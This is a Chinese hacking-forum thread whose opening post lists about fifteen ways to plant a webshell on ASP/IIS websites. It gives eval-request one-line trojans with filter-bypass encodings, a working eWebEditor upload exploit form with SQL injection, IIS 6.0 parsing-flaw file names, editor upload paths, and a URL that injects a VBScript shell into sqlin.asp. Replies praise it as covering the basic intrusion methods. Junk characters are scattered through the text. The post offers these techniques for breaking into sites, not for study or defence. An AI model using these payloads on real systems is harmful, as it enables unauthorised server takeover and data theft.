返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
, t. S/ f& T9 ~
( D; {# Q+ G9 B5 n; }2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
# h  _/ z) G4 s9 ~! X  K, Q. s( K+ M) K
3.上传漏洞:9 J* ?9 L* N4 @% K, }# s5 Y
8 R1 E6 V" o. h! N8 ?0 ^. h5 [% j$ k
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
( u, Q9 s( N! K2 ]7 j( v7 @* `- E4 w+ h& O: V% o! z
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
! C& {1 f# Q. ]/ A0 `+ l/ o& E1 W" W+ d4 m, U4 J$ c
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp5 ~: z$ T$ g: D; ]4 s
然后在上传文件里面填要传的图片格式的ASP木马
+ h" c% [  F% S4 [$ \" ?! u就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
. s5 \6 |) J7 @/ ?( _$ L2 [5 e4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传: w6 T/ n5 k, H1 M2 a/ f( f6 P
# V* O% S' P; o" K
<html>
4 o! a0 b$ M' X<head>
6 f; k3 C" u( {5 ~. `( E<title>ewebeditor upload.asp上传利用</title>3 d8 Q" y8 @$ a# R9 j$ p( ~0 m
</head>8 P- I4 [" t& r4 _8 u. k+ B! ]8 O/ [
<body>
; L6 z% P% X# Y! o<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
" ]* C: A) l! A8 ^! y& r<input type=file name=uploadfile size=100><br><br>
. _2 t& [2 t/ K# Y* Q1 k# {3 V<input type=submit value=Fuck>
2 N  e$ X' a. W4 F9 F( p9 Q</form>
. @, Q. z* Z" a) v( h) w' I</body>
4 u+ z6 r9 c# [; r2 ]  c</form>7 V" ^2 i& b9 f% G+ T* G
</html>
' `0 ^5 W3 D0 S; @# g/ X; H
5 q( v( i1 L; m2 c" U' V/ Q2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问% h) V6 o- V: m, F& S/ n: z- i% P
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp% ~/ Z3 O0 m/ P+ d3 }0 U: _2 w

8 @4 \) g  A5 W% Y+ Z利用windows2003解析。建立zjq.asp的文件夹# H, Q4 `: J6 L

/ \: s1 w) s8 S* m3 b6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型! f: `4 n6 m; \8 B1 P' q

' p- R8 u; _+ C& _6 i7.cuteeditor:类似ewebeditor
/ c: J& ]8 j* z8 f/ l+ ]# h5 z5 A% V/ [8 Z; M" q: v8 S# E* N
8.htmleditor:同上( W. _; h, T- |3 C+ Z) j( @3 T6 @
/ i0 s" \% ]1 \
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破9 g) B. \3 a0 n+ e. y- f( l+ u( Q

5 \8 [+ m- L3 b4 A<%execute request("value")%><%'<% loop <%:%>
" F# ?# d: h2 o2 g7 E6 I5 l8 c# N# g, r0 Z' M
<%'<% loop <%:%><%execute request("value")%>
. M0 d+ Z6 i" d6 [7 _& [& n
$ Q! p8 \# i6 Y- H. [<%execute request("value")'<% loop <%:%>
1 q) a; R, O7 m5 y% X. C" p% {: k9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
. D! K2 k! d3 Y7 U$ J2 [% J$ G5 N( O: Q+ }7 c
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
# ?: a' \5 ?3 G& z) _$ [7 K* y$ b
4 P; |# f1 l  E" _11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3% w% \2 N+ {0 b

  U) t' T% K8 v4 W$ }4 I; Q解析漏洞得到webshell
1 O4 w7 P1 C1 |2 Q
1 H% N& j5 m2 h" J* @! x2 |12.mssql差异备份,日志备份,前提需知道web路径
! X/ E& U/ l% q( V0 J" n$ H1 Q! i+ Q0 n# }, W
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell' J- E/ E7 X$ a5 Q
/ J0 G2 ~4 U. N9 V7 }
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
! d5 {, H0 ]3 E$ s# d6 c/ Q4 F7 c( a2 q& ~! a2 p
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可2 m; W3 x. J2 r: t/ q! T. `+ {8 h

) B* `! J6 ]$ t8 H; p以上只是本人的一些拙见,并不完善,以后想到了再继续添加
8 f6 r! t. g' _不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 + t/ k% t1 o. ^5 n$ o

: Y' L  ?9 ?4 ^6 Q
9 G$ A9 W' g  X8 Z- ?很好啊、基本的入侵方法都包含了  U9 g, V% Y0 d+ Z. j) U- j
: P/ H" a& _& H1 ]
最好来个提权的帖子再。
  N, q" Z" [8 d/ m, y# S1 g1 C: p8 p- m6 v- Z3 f6 ]* b( L! l
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表